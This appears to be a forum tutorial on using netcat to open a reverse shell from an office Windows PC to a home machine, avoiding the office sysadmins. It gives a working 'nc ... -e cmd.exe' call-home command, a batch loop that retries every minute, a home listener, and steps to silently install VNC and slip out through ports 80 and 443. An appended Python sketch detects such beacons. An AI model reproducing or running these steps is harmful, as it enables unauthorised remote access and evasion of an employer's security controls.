Intro
This tutorial has been inspired by "How to build a low cost Linux Home Server", published by superczar, 30 Nov 07. I have already been doing what he prescribed in the article, but I wanted to do more, in this case reverse connections, i.e. connecting to my office computer from home, without having to bother the "friendly" sysadmins. I am not sure about the common practical usage, but I like leaving the office on time and probably going home to work in comfort. So here it goes.
I essentially use the Swiss army knife of network utilities, Netcat. I have been fascinated by this one, with its ability to pipe anything to the network and get anything from the network in numerous combinations. This also requires one to be able to access the world from the office computer, i.e. at the very minimum port 80 (which is usually open). If more are open, the better it is.
The basic idea lies in netcat's ability to spawn a process when a connection is established. Having used this property a lot of times when nc is used as a server, people don't really think it can be exploited even when nc is used as a client. The option "-e" is not available in the default builds; luckily the winnt mod present on the nc site has this, and my office comp happens to be a Windows XP box.
Step 1 Configure home comp
1. Get an account with DynDNS and register a subdomain. Cost: Nothing
2. Set up the home comp to update the DynDNS record, either automatically (using misc utils available on the net) or set up the modem to update this record every time it comes up (at least my Beetel 220 BX has this option).
3. Configure the modem to fwd the chosen port to the home pc. I'd call this port PORT XXX.
4. Ensure there is nobody listening on port XXX on the home comp.
Step 2 Office computer
We have to arrange the office computer to call home now. This is arranged by
1. Download and unzip nt netcat version from (http://www.vulnwatch.org/netcat/).
2. Run it to call the home DNS name and port XXX as
Code:
nc pluto.home.net XXX -e cmd.exe
What this means is that nc would call pluto.home.net at port XXX and when the connection is established, it spawns cmd.exe and transparently redirects stdin/stdout till connection is terminated.
3. Ideally I'd set this up in a batch script to call home every 60 seconds. A ready-made script is
Code:
---------------
@echo off
:START
C:\temp\nc.exe pluto.home.net XXX -e cmd.exe
@ping 127.0.0.1 -n 60 -w 1000 > nul
goto START
--------------------
The script tries to establish a connection. If nc times out, it pings the local machine for 60 packets and then goes back to START. The ping trick is because I could not find sleep.exe from the Windows Resource Kit.
Step 3 Home comp receives the call
Now we have to make the home comp receive the call. Download the appropriate version of Netcat for your home comp OS. Mine is XP so I stuck with NT netcat.
Code:
nc -l -p XXX
As soon as netcat starts listening, and the script is at the correct cycle of trying to connect home, a connection would be established and you'd get the command prompt. If it doesn't connect immediately, wait for the ping sleep cycle to come around.
Now that you have the prompt, the box is yours and you know what to do
Taking it forward:
1. Once I had the prompt,
a. I used wget to download the latest version of tightvnc and installed it silently (I already had wget on my office machine).
b. I opened port 5500 on my modem to fwd it to my home comp and placed the vncviewer in listening mode on my home comp.
c. I created a batch file using "echo" to make winvnc connect to my home IP.
d. I scheduled this batch file using "at" command to a couple of minutes after "time /t". And then patiently waited for my office comp to call home.
e. It did, and now I have the office comp desktop.
Here my office allowed connections to 5500 to go out. In case yours doesn't, choose a port which is allowed. The most commonly allowed ports are 80 (HTTP) and 443 (HTTPS). Unless your company is very, very crazy about security, i.e. checks the packet type on the ports as well, I think you should be able to get out; just configure the ports appropriately for nc/vnc/whatever.
There are a lot of improvements that can be made to this, but I wanted to make it work as a proof of concept. Any inputs/criticisms are welcome.
There may be ready-made/better ways to make it work. I would be glad to hear about those, but this one helped me scratch the itch that comes back once in a while.
Adios
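
From the monitoring side, the call-home loop described in Step 2 leaves two signals: a process started with `-e cmd.exe`, and an outbound connection retried on a fixed timer. The following detection sketch is an added example, not part of the original post; the log formats, IP addresses, the renamed `svc.exe` and the thresholds are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample data in an assumed, simplified format (not real logs).
# Egress firewall log: "<timestamp> <src> <dst> <dport> <flag>"
FW_LOG = """\
2024-05-01T18:00:02 10.0.0.23 203.0.113.7 80 SYN
2024-05-01T18:00:40 10.0.0.51 198.51.100.9 443 SYN
2024-05-01T18:01:03 10.0.0.23 203.0.113.7 80 SYN
2024-05-01T18:02:04 10.0.0.23 203.0.113.7 80 SYN
2024-05-01T18:02:10 10.0.0.51 198.51.100.9 443 SYN
2024-05-01T18:03:05 10.0.0.23 203.0.113.7 80 SYN
2024-05-01T18:09:30 10.0.0.51 198.51.100.9 443 SYN
2024-05-01T18:09:31 10.0.0.51 198.51.100.9 443 SYN
"""
# Process-creation command lines; the first is the one from the post.
CMDLINES = [
    r"C:\temp\nc.exe pluto.home.net XXX -e cmd.exe",
    r"C:\temp\svc.exe pluto.home.net XXX -e C:\Windows\System32\cmd.exe",  # renamed binary
    r"C:\tools\backup.exe -e C:\logs\cmd_errors.txt",
    r'perl -e "print 1"',
]
# Match "-e <command interpreter>" regardless of the executable's name, since
# the binary can be renamed; keying on "nc.exe" alone would miss that.
SHELL_EXEC = re.compile(r'(?i)(?:^|\s)-e\s+"?(?:\S*[\\/])?(?:cmd|powershell)(?:\.exe)?"?(?:\s|$)')

def shell_exec_cmdlines(cmdlines):
    """Return the command lines whose -e option is handed a shell."""
    return [c for c in cmdlines if SHELL_EXEC.search(c)]

def beacon_flows(log, min_events=4, max_jitter=0.1):
    """Return {(src, dst, dport): mean gap in seconds} for flows retried at a near-fixed period."""
    seen = defaultdict(list)
    for line in log.splitlines():
        ts, src, dst, dport, _flag = line.split()
        seen[(src, dst, int(dport))].append(datetime.fromisoformat(ts))
    hits = {}
    for flow, times in seen.items():
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        # Low spread relative to the mean gap points to a timer, not a person.
        if len(times) >= min_events and 0 < mean(gaps) and pstdev(gaps) <= max_jitter * mean(gaps):
            hits[flow] = round(mean(gaps))
    return hits

if __name__ == "__main__":
    print(shell_exec_cmdlines(CMDLINES), beacon_flows(FW_LOG))
```

The fixed-period check works on allowed ports such as 80 and 443 as well, because it looks at timing rather than port number.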